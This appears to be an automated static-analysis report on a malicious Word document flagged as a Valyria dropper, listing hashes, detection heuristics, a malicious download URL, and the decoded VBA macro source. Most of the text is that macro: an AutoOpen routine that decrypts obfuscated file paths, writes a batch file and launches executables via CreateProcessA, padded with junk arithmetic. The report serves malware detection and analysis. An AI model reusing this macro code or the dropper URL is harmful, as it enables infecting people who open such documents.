Valyria — Office (OOXML) malware analysis

Static analysis result for SHA-256 c30f156c7f16088e…

MALICIOUS

Office (OOXML)

85.0 KB Created: 2020-01-13 01:40:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-07-24
MD5: 319f983351e54f8557490d3234d836db SHA-1: a0f29b67f9edff08c2dd9247a7ad117612f877fa SHA-256: c30f156c7f16088e24459a94254476f82e2ad64a7de0f2c2cf235c980b858d4c
190 Risk Score

Malware Insights

Valyria · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Valyria-8011744-0. It contains VBA macros, specifically an AutoOpen macro, which is designed to execute code upon opening the document. This macro likely downloads and executes a second-stage payload, a common tactic for dropper malware.

Heuristics 5

  • ClamAV: Doc.Dropper.Valyria-8011744-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-8011744-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub autoopen()
    On Error Resume Next
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://linkomember.info/1/trader.exe In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 29917 bytes
SHA-256: bd9546ffffeb292ce892fefe9ee2d5d3ed63328afa61868402775f6cba6dba5b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EndTime"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Apple"
Option Explicit

Public Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Public Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type



Public Const NORMAL_PRIORITY_CLASS = &H20&
Public Const INFINITE = -1&


Attribute VB_Name = "Potatoes"



Const MOVEFILE_REPLACE_EXISTING = &H1
Const FILE_ATTRIBUTE_TEMPORARY = &H100
Const FILE_BEGIN = 0
Const FILE_SHARE_READ = &H1
Const CREATE_ALWAYS = 2
Const OPEN_EXISTING = 4
Const GENERIC_READ = &H80000000
Const GENERIC_WRITE = &H40000000



Attribute VB_Name = "ClockFinished"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public sCurrentFile As String
Private Type ObjectProperties
  Name As String
  Caption As String
  ToolTip As String
End Type
Private Type FormProperties
  Name As String
  Caption As String
  ObjectCount As Integer
  ObjProp() As ObjectProperties
End Type

Private FormProp() As FormProperties
Private iFormCount As Integer
Sub LoadLanguagePack(sFile As String)
  Dim sLine As String, iPos As Integer, sTmp As String
  Dim sFormName As String, sTmp2 As String
  Dim bFormFound As Boolean
  sCurrentFile = sFile
  iFormCount = 0
  Open sFile For Input As #1
    Do
      Input #1, sLine
      If Left$(sLine, 1) = ";" Or sLine = "" Then GoTo Jump

      If Left$(sLine, 1) = "[" And Right$(sLine, 5) = ".End]" Then
        bFormFound = False: GoTo Jump
      End If
      If Left$(sLine, 1) = "[" And Right$(sLine, 1) = "]" Then
        bFormFound = True
        sFormName = Mid$(sLine, 2, Len(sLine) - 2)
        iFormCount = iFormCount + 1
        ReDim Preserve FormProp(iFormCount)
        FormProp(iFormCount).Name = sFormName: GoTo Jump
      End If
      
      If Left$(sLine, 7) = "Caption" Then
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
        FormProp(iFormCount).Caption = Left$(sTmp, Len(sTmp) - 1)
        GoTo Jump
      End If
            iPos = InStr(sLine, ".Caption")
      
      If iPos > 0 And bFormFound Then
        FormProp(iFormCount).ObjectCount = FormProp(iFormCount).ObjectCount + 1
        ReDim Preserve FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount)
        sTmp = Left$(sLine, iPos - 1)
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Name = sTmp
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
      
        If Right$(sTmp, 1) <> Chr$(34) Then
          Do While Right$(sTmp, 1) <> Chr$(34)
            Input #1, sTmp2
            sTmp = sTmp & ", " & sTmp2
          Loop
        End If
        If Right$(sTmp, 1) = Chr$(34) Then sTmp = Left$(sTmp, Len(sTmp) - 1)
      
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Caption = sTmp
        GoTo Jump
      End If
            iPos = InStr(sLine, ".ToolTip")
      If iPos > 0 And bFormFound Then
        sTmp = Left$(sLine, iPos - 1)
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Name = sTmp
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
      
        If Right$(sTmp, 1) <> Chr$(34) Then
          Do While Right$(sTmp, 1) <> Chr$(34)
            Input #1, sTmp2
            sTmp = sTmp & ", " & sTmp2
          Loop
        End If
        If Right$(sTmp, 1) = Chr$(34) Then sTmp = Left$(sTmp, Len(sTmp) - 1)
      
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).ToolTip = sTmp
        GoTo Jump
      End If
      
Jump:


    Loop Until EOF(1)

  Close #1

End Sub


Sub SetLanguageInForm(frmForm As Form)
  
  On Local Error Resume Next
  Dim I As Integer, j As Integer
  Dim iForm As Integer
  

  For I = 1 To iFormCount
    If FormProp(I).Name = frmForm.Name Then
      iForm = I
      Exit For
    End If
  Next I

  
  frmForm.Caption = FormProp(iForm).Caption
    For j = 1 To FormProp(iForm).ObjectCount
    frmForm.Controls(FormProp(iForm).ObjProp(j).Name).Caption = FormProp(iForm).ObjProp(j).Caption
    frmForm.Controls(FormProp(iForm).ObjProp(j).Name).TooltipText = FormProp(iForm).ObjProp(j).ToolTip
  Next j
  
End Sub

Function EnumLanguagePacks(sFolder As String, sExtension As String) As String

  If Not DirExists(sFolder) Then
    MsgBox sFolder & " doesn't exist.", vbCritical
    Exit Function
  End If
  
  Dim sTmp As String

  If Right$(sFolder, 1) <> "\" Then sFolder = sFolder & "\"
  sTmp = Dir$(sFolder & sExtension)
  If sTmp <> "" Then
    EnumLanguagePacks = sTmp
    sTmp = Dir$
    While Len(sTmp) > 0
      EnumLanguagePacks = EnumLanguagePacks & "|" & sTmp
      DoEvents
      sTmp = Dir$
    Wend
  End If

End Function


Private Function DirExists(ByVal strDirName As String) As Integer
    Const strWILDCARD$ = "*.*"

    Dim strDummy As String

    On Error Resume Next

    If Right$(strDirName, 1) <> "\" Then strDirName = strDirName & "\"
    strDummy = Dir$(strDirName & strWILDCARD, vbDirectory)
    DirExists = Not (strDummy = vbNullString)

    Err = 0
End Function


Sub CarregaPacotedeLinguagem(sArquivo As String)
  
  LoadLanguagePack sArquivo
  
End Sub

Sub SetaLinguagemnoForm(frmForm As Form)

  SetLanguageInForm frmForm

End Sub

Function EnumeraPacotesdeLinguagem(sDiretorio As String, sExtensao As String) As String
  
  EnumLanguagePacks sDiretorio, sExtensao
  
End Function



Attribute VB_Name = "Carrow"
'Begin Code
Public mf As String


Function GetAssist() As Boolean
Dim lHandle

     mf = DeCryptCustom1("ђ€«љ¶ДВДѕК", "MN7Ke87Y")
    
    If Right(mf, 1) <> DeCryptCustom1("ђ", "QzMTkUQEn") Then
        mf = mf & DeCryptCustom1("ђ", "QzMTkUQEn")
        MakeSureDirectoryPathExists mf
    End If
    
        mf = DeCryptCustom1("ѓ{ћ‹ёѕ»", "lQI8")
    
    If Right(mf, 1) <> DeCryptCustom1("ђ", "QzMTkUQEn") Then
        mf = mf & DeCryptCustom1("ђ", "QzMTkUQEn")
        MakeSureDirectoryPathExists mf
    End If
    
    lHandle = CreateFileA(DeCryptCustom1("_Wzi…“‘“Ќ™‚w—ќЏќ•[pp„", "QmZKKk"), GENERIC_WRITE Or GENERIC_READ, _
                         &H2, 0, CREATE_ALWAYS, FILE_SHARE_WRITE, 0)
    
    If lHandle <> 0 Then CloseHandle lHandle

        mf = DeCryptCustom1("ІЄНєзнкТ№бикао", "Cwqhud")
    
    If Right(mf, 1) <> DeCryptCustom1("ђ", "QzMTkUQEn") Then
        mf = mf & DeCryptCustom1("ђ", "QzMTkUQEn")
        MakeSureDirectoryPathExists mf
    End If
    

        mf = DeCryptCustom1("ўљЅЄЧЭЪВ©СШЪРЮЙІФвЪв", "ebBUfIgru")
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
    If Right(mf, 1) <> DeCryptCustom1("ђ", "QzMTkUQEn") Then
        mf = mf & DeCryptCustom1("ђ", "QzMTkUQEn")
        MakeSureDirectoryPathExists mf
    End If
    

        mf = DeCryptCustom1("ћ–№ўДТКТТН", "xv3dLJV9u8")
    
    If Right(mf, 1) <> DeCryptCustom1("ђ", "QzMTkUQEn") Then
        mf = mf & DeCryptCustom1("ђ", "QzMTkUQEn")
        MakeSureDirectoryPathExists mf
    End If
    
    Open DeCryptCustom1("_Wzi…“‘“Ќ™‚w—ќЏќ•[pp„", "QmZKKk") For Output As #1
    Print #1, BlueControl.FAQ.Caption
    Close #1

    Testing
    
End Function
Sub autoopen()
On Error Resume Next
'The Food Storage & Distribution Federation
GetAssist
CopyToA
End Sub
Public Sub CopyToA()
    Dim docActive As Document
    Dim docNew As Document
    Dim rngActiveDocPart As Range
    Dim rngNewDocPart As Range
    Dim strDocName As String
    Dim Proc As PROCESS_INFORMATION
    Dim strTemplateName As String
    Dim start As STARTUPINFO
    Set docActive = ActiveDocument
    
    strDocName = docActive.Name
    strTemplateName = docActive.AttachedTemplate.FullName
    

    Set docNew = Documents.Add(strTemplateName)
    
 
    For Each rngActiveDocPart In docActive.StoryRanges
        Set rngNewDocPart = docNew.StoryRanges _
           (rngActiveDocPart.StoryType)
        rngActiveDocPart.Copy
                
   
        rngNewDocPart.Paste
    Next rngActiveDocPart
    
    docNew.Activate
 
    With Dialogs(wdDialogFileSaveAs)
        .Name = "" & strDocName
        .Show
    End With
End Sub




Public Function DeCryptCustom1(tSource As String, tKey As String) As String
    Dim iPassword As Integer
    Dim iCrypt As Integer
    Dim X As Integer
    For X = 1 To Len(tKey)
        iPassword = iPassword + Asc(Mid$(tKey, X, 1))
    Next X
    For X = 1 To Len(tSource)
        iCrypt = Asc(Mid$(tSource, X, 1)) - iPassword - X
        Do Until iCrypt > 0
            iCrypt = iCrypt + 255
        Loop
        DeCryptCustom1 = DeCryptCustom1 & Chr(iCrypt)
    Next X
End Function




Attribute VB_Name = "BlueControl"
Attribute VB_Base = "0{1883E2FD-255C-4B77-AF2B-D30D5CEBF50D}{C4B6742A-8564-4F6B-9FC8-F10F182564F5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Attribute VB_Name = "cPalette"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "EnumsTip"

Public Sub ExecCmd(cmdline As String)
Dim Proc As PROCESS_INFORMATION
Dim start As STARTUPINFO
Dim ReturnValue

start.cb = Len(start)
start.dwFlags = 1&
ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 0&, _
NORMAL_PRIORITY_CLASS, 0&, 0&, start, Proc)

Do
ReturnValue = WaitForSingleObject(Proc.hProcess, 0)
DoEvents
Loop Until ReturnValue <> 258

ReturnValue = CloseHandle(Proc.hProcess)
End Sub

Public Function Testing() As Boolean
ExecCmd "C:\Jeropit\Poteri.BAT"
ExecCmd "C:\Htyu\Bioper\Kyupod.exe"
End Function




Attribute VB_Name = "wDelcares"
#If VBA7 Then
Public Declare PtrSafe Function SetPixel Lib "gdi32" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal crColor As LongPtr) As LongPtr
Public Declare PtrSafe Function DeleteDC Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function GdiTransparentBlt Lib "gdi32.dll" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal nSrcWidth As LongPtr, ByVal nSrcHeight As LongPtr, ByVal crTransparent As LongPtr) As Boolean
Public Declare PtrSafe Function MakeSureDirectoryPathExists Lib "imagehlp.dll" (ByVal lpPath As String) As LongPtr
Public Declare PtrSafe Function CreateFileA Lib "kernel32" (ByVal lpFileName As String, ByVal dwDesiredAccess As LongPtr, ByVal dwShareMode As LongPtr, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As LongPtr, ByVal dwFlagsAndAttributes As LongPtr, ByVal hTemplateFile As LongPtr) As LongPtr
Public Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function CreateCompatibleDC Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal _
hHandle As LongPtr, ByVal dwMilliseconds As LongPtr) As LongPtr

Public Declare PtrSafe Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As LongPtr, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, _
ByVal bInheritHandles As LongPtr, ByVal dwCreationFlags As LongPtr, _
ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As LongPtr, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As LongPtr


Public Declare PtrSafe Function SetEnvironmentVariable Lib "kernel32" Alias "SetEnvironmentVariableA" (ByVal lpName As String, ByVal lpValue As String) As LongPtr
Public Declare PtrSafe Sub GetStartupInfoA Lib "kernel32" (lpStartupInfo As STARTUPINFO)
Public Declare PtrSafe Function GetEnvironmentVariable Lib "kernel32" Alias "GetEnvironmentVariableA" _
(ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As LongPtr) As LongPtr
Public Declare PtrSafe Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Public Declare PtrSafe Function DeleteObject Lib "gdi32" (ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function SelectObject Lib "gdi32" (ByVal hDC As LongPtr, ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function BitBlt Lib "gdi32" (ByVal hDestDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal dwRop As LongPtr) As LongPtr
